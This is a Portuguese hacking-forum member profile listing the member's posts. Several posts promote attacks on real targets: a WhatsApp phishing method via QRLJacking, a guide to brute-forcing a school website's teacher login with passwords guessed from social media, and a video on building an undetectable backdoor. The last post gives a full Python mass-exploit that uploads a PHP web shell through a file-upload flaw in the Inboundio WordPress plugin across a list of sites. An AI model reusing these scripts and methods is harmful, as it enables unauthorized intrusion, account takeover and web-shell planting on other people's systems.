Ir para conteúdo

FaceOs

Membros
  • Total de itens

    90
  • Registrado em

  • Última visita

  • Dias Ganhos

    23

FaceOs ganhou o dia em 16 de novembro

FaceOs teve o conteúdo mais curtido!

Reputação

96 Excelente

8 Seguidores

Sobre FaceOs

  • Rank
    FaceOs

Últimos Visitantes

811 visualizações
  1. Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking Hackear WhatsApp... Um tema, peculiar, não? A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa... Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria? - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..." Pois é meu querido... Tem como! Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login. Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp. Veja como:
  2. SUBT - BRUTEFORCE EM SUBDOMÍNIOS COM O PYTHON Daí você tá fazendo aquele footprint massa (https://forum.fsocietybrasil.org/topic/1069-pegando-informações-com-o-maltego/ ), pegando e-mails, nomes, e extraindo informações de imagens (https://forum.fsocietybrasil.org/topic/1079-extraindo-textos-de-imagens-com-o-python/)... Só que aí, você sente que falta algo, falta mais informações, mais diretórios e lugares para explorar no site. Pensando nisso eu e o @Pedro, críamos uma ferramenta que realiza brute-force em subdomínios. FERRAMENTA PARA O PYTHON 2x JÁ VEM COM WORDLIST DOWNLOAD!
  3. EXTRAINDO TEXTOS DE IMAGENS COM O PYTHON Hoje, vou mostrar para vocês, uma técnica de Reconhecimento Ótico de Caracteres (ROC), com o Python usando a biblioteca Tesseract, que foi disponibilizada pelo nosso querido Google. Optical Character Recognition (OCR) O OCR, consiste em uma tecnologia para reconhecer caracteres em uma imagem. Sendo assim, tú consegue usar para extrair dados de imagens, como datas, horários, nomes... Uma ótima opção para auxiliar no teu footprint. Instalando o Tesseract Para começar, vou ensinar vocês a instalarem o Tesseract para o Python 3x, no Debian e seus derivados. Instalando as dependências Instalação do Tesseract-OCR: $ sudo apt-get install tesseract-ocr tesseract-ocr-por Instalação da lib PIL e suas dependências (Debian, Ubuntu e derivados): $ sudo apt-get install python-dev python3-dev build-essential liblcms2-dev zlib1g-dev libtiff5-dev libjpeg8-dev libfreetype6-dev libwebp-dev Usando o Tesseract Com o Tesseract e suas dependências já instalados vamos começar nosso código. Primeiramente, abra uma imagem que você queira extrair o texto. No meu programa, DictyPy, eu fiz a extração o significado da palavra legal, usando esta tecnologia. Enfim... Para começar com o nosso código, vamos importar as bibliotecas necessárias: from PIL import Image import pytesseract Depois disso, basta abrir a imagem com Pillow e extrair os caracteres pelo Tesseract. imagem = Image.open("nome_da_imagem.jpg") print(pytesseract.image_to_string(imagem)) PRONTO! Viram como é simples? Tu pode usar essa técnica para criar ferramentas como a minha, ou de outros tipos, além de variar e agregar o mundo do desenvolvimento e da segurança da informação.
  4. DictyPy - UM DICIONÁRIO EM PYTHON (de um jeito diferente...) Eae pessoal, tudo bem com vocês? Hoje eu vim trazer para vocês uma ferramenta em Python, que eu codei, que realiza a busca do significado de uma palavra em uma imagem, e extrai as palavras da imagem. Para usar o programa, é necessário antes, instalar 2 bibliotecas do Python. Caso você esteja no Debian, ou derivados (Ubuntu, Kali Linux...) sudo apt-get install tesseract-ocr tesseract-ocr-por sudo apt-get install python-dev python3-dev build-essential liblcms2-dev zlib1g-dev libtiff5-dev libjpeg8-dev libfreetype6-dev libwebp-dev sudo -H pip install Pillow sudo -H pip install pytesseract Pronto! Com as bibliotecas já instaladas, basta realizar o download do programa no meu GitHub, e usar. DOWNLOAD
  5. A coleta de informações é um dos assuntos mais importantes quando falamos de pentest. Para alcançarmos sucesso em nossa invasão, é necessário temos muitas informações sobre o alvo. Independente de qual informação seja, é necessário, termos o máximo possível. São essas informações que serão responsáveis pelo nosso sucesso, e podemos confirmar isso hackeando o site da sua escola, ou um site ou pessoa qualquer. Tendo isso em mente, eu lhes trago um vídeo lhe ensinando à coletar informações de forma adequada usando a ferramenta Maltego. * VÍDEO DO CANAL: FenixSec. https://youtu.be/oSJCUfEcgT0
  6. HACKEANDO O SITE DA ESCOLA Antes de tudo. Esse post de certa forma, VAI ENSINAR ALGUMAS TÉCNICAS QUE PODEM SER USADAS EM UM ATAQUE NO SITE DE SUA ESCOLA E QUE PODEM LHE GARANTIR ACESSO AO SERVIDOR! Entretanto, o método que usaremos para atacar não é 100% de certeza que vai funcionar, e exige muito tempo e paciência. Enfim, tendo isso em mente, vamos começar. FASE 1 - Coleta de informações: Antes de começar a atacar, nós temos de ter em mente o planejamento, nós temos que planejar cada etapa do ataque, da coleta de informação até a exploração, e vai funcionar assim: Como iremos usar um método de ataque chamado brute-force, ou seja, um ataque de força bruta, precisamos saber como o sistema funciona e quem tem uma conta no sistema. Como no caso, o sistema é da sua escola, quem tem acesso são os professores, então, como nós já sabemos o nome de nossos professores, vamos salvar em um .TXT. O nome do meu (fictício) é José Henrique. Com o nome de seu professor salvo, vamos acessar o site e entender como o sistema funciona. Ao entrarmos no site, podemos ver duas coisas: Que damos de cara com um sistema de login, ou seja, que é um sistema restrito a professores. E que, o login é efetuado por E-MAIL e não usuários. Sendo assim, é bem provável (98% de certeza) que o professor em específico deva utilizar seu e-mail no login. Tendo isso mente, agora nós temos que saber de algumas informações do professor, tanto pra auxiliar na descoberta de sua senha e para descobrirmos o e-mail. Vamos descobrir essas coisas em suas redes sociais, é o melhor método de pegar informações atualmente. Ao acessar a aba "sobre" do Facebook do seu professor, podemos ver algumas informações, como suas informações de contato. E ao descobrirmos isso, podemos ver também a data em que ele nasceu, dentre outras informações. Essa questão da data é importante, pois, MUITA gente coloca data, dia, mes, ou ano de nascimento em seus emails ou senhas, como podemos ver em destacado na imagem. Tendo essas informações, creio que ja dê para a gente atacar. Fase 2 - Exploração. Bem, como nós já conseguimos algumas informações necessárias, vamos montar nossa lista. Eu montei uma lista curta de 4 linhas para resumir um pouco, mas tu pode montar uma lista BEEEM maior. Na lista temos as seguintes senhas: professorjose jose123 jose73 josehenrique1973 Agora, com nossa lista já montada, nós podemos começar. Vamos decidir o programa que iremos usar, EXISTEM VÁRIOS que podem se utilizados no caso. No fim do post eu deixarei a recomendação de alguns. Mas neste tutorial em específico, vou usar um programa de bruteforce HTTP simples que eu criei. Basicamente, todos os programas usam a mesma lógica: Botar um e-mail (ou uma lista de e-mails), e colocar uma lista de senhas. No meu caso, eu fiz um rápido pra entrada de um e-mail. No caso, eu coloquei o email e a lista de senhas do professor e o ataque começou. Enquanto ele vai testando as senhas, ele vai enviando o output pra você dizendo se a senha é correta ou não. De fato, com o teste realizado, ele descobriu a nossa senha. Após recebermos o e-mail e a senha corretos, vamos logar com eles no site, certo? CONSEGUIMOS!!! Dicas de programas que realizam Brute-force HTTP: - Hydra - Burp Suit - E meu próprio programa:
  7. Eae pessoal, hoje trago à vocês, um vídeo ensinando a fazer uma backdoor 100% FUD com o script Powershell Empire.
  8. E aí pessoal, hoje trago-lhes alguns sites com cursos (EAD) gratuitos, inclusive, alguns com a obtenção de certificados. https://www.primecursos.com.br/ http://www.cursosonlinesp.com.br http://www.cursou.com.br http://www.inead.com.br https://www.cursosgratisonline.com.br Todos possuem cursos relacionados a TI, mas não se limitam somente a isso. Ou seja, com a vontade de estudar, tu pode estudar o que quiser e sem limites. Confesso que muita coisa que sei hoje, aprendi com alguns cursos desses sites. Espero que tenham gostado <3.
  9. E aí pessoal, hoje trago-lhes alguns sites com cursos (EAD) gratuitos, inclusive, alguns com a obtenção de certificados. https://www.primecursos.com.br/ http://www.cursosonlinesp.com.br http://www.cursou.com.br http://www.inead.com.br https://www.cursosgratisonline.com.br Todos possuem cursos relacionados a TI, mas não se limitam somente a isso. Ou seja, com a vontade de estudar, tu pode estudar o que quiser e sem limites. Confesso que muita coisa que sei hoje, aprendi com alguns cursos desses sites. Espero que tenham gostado <3.
  10. FaceOs

    FcSF | FaceOs Framework

    Tem que evoluir né pô AHDUEHDUAHDUSHA
  11. E aí pessoal, hoje trago à vocês um curso de redes de computadores, matéria essencial para estudos sobre hacking e segurança da informação, contendo com 52 vídeos, com uma explicação curta e fácil de entender, distribuído pela Bóson Treinamentos de forma gratuita. LINK: https://www.youtube.com/playlist?list=PLucm8g_ezqNpGh95n-OdEk06ity7YYfvU
  12. Eae pessoal, criei esse exploit em massa, para explorar uma vulnerabilidade no tema Inboundio, a qual lhe permite enviar arquivos (Shell) de forma arbitrária. #!/usr/bin/python #Escrito por Derick Santos #Conheca a FSociety Brasil: https://www.fsocietybrasil.org.br/ try: try: from colorama import * import colorama except: print "[!] ERRO! Necessario a biblioteca COLORAMA! Instale com - \n\n pip install colorama OU easy_install colorama" sys.exit(1) try: import requests except: print Fore.RED+"[!] ERRO! Necessario a biblioteca REQUESTS! Instale com - \n\n pip install requests OU easy_install requests" sys.exit(1) import platform import time import sys import os so = platform.system() if so == "Windows": cleaning = os.system("cls") else: cleaning = os.system("clear") try: lista = raw_input(Fore.WHITE+"Lista de sites: ") list = open(lista, "rb") except: print Fore.RED+"[!]"+Fore.WHITE+" Erro! O arquivo nao foi encontrado." for sites in list: sites = sites.rstrip() if "http://" not in sites: sites = "http://"+sites else: sites = sites print Fore.BLUE+"\n[!]"+Fore.WHITE+" SITE - {}\n".format(sites) payload = {"file" : "<?php system($_GET['shell']); ?>" } path_vul = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" id_vul = sites+path_vul id_process = requests.get(id_vul) if id_process.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"[!]"+Fore.WHITE+" Testando exploit!" exploiting = requests.post(id_vul,files=payload) if exploiting.status_code == 200: verifica_shell = requests.get("/inboundio-marketing/admin/partials/uploaded_csv/?shell=") if verifica_shell.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" Shell upada! - {}".format(sites+"/inboundio-marketing/admin/partial/uploaded_csv/?shell=[CMD]") else: print Fore.RED+"[!]"+Fore.WHITE+" Shell nao upada!" else: print Fore.RED+"[!]"+Fore.WHITE+" SITE NAO VULNERAVEL!" else: print Fore.RED+"[!]"+Fore.WHITE+"SITE NAO VULNERAVEL!" except KeyboardInterrupt: print Fore.RED+"\n[!]"+Fore.WHITE+" Ate mais!" sys.exit(1)
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.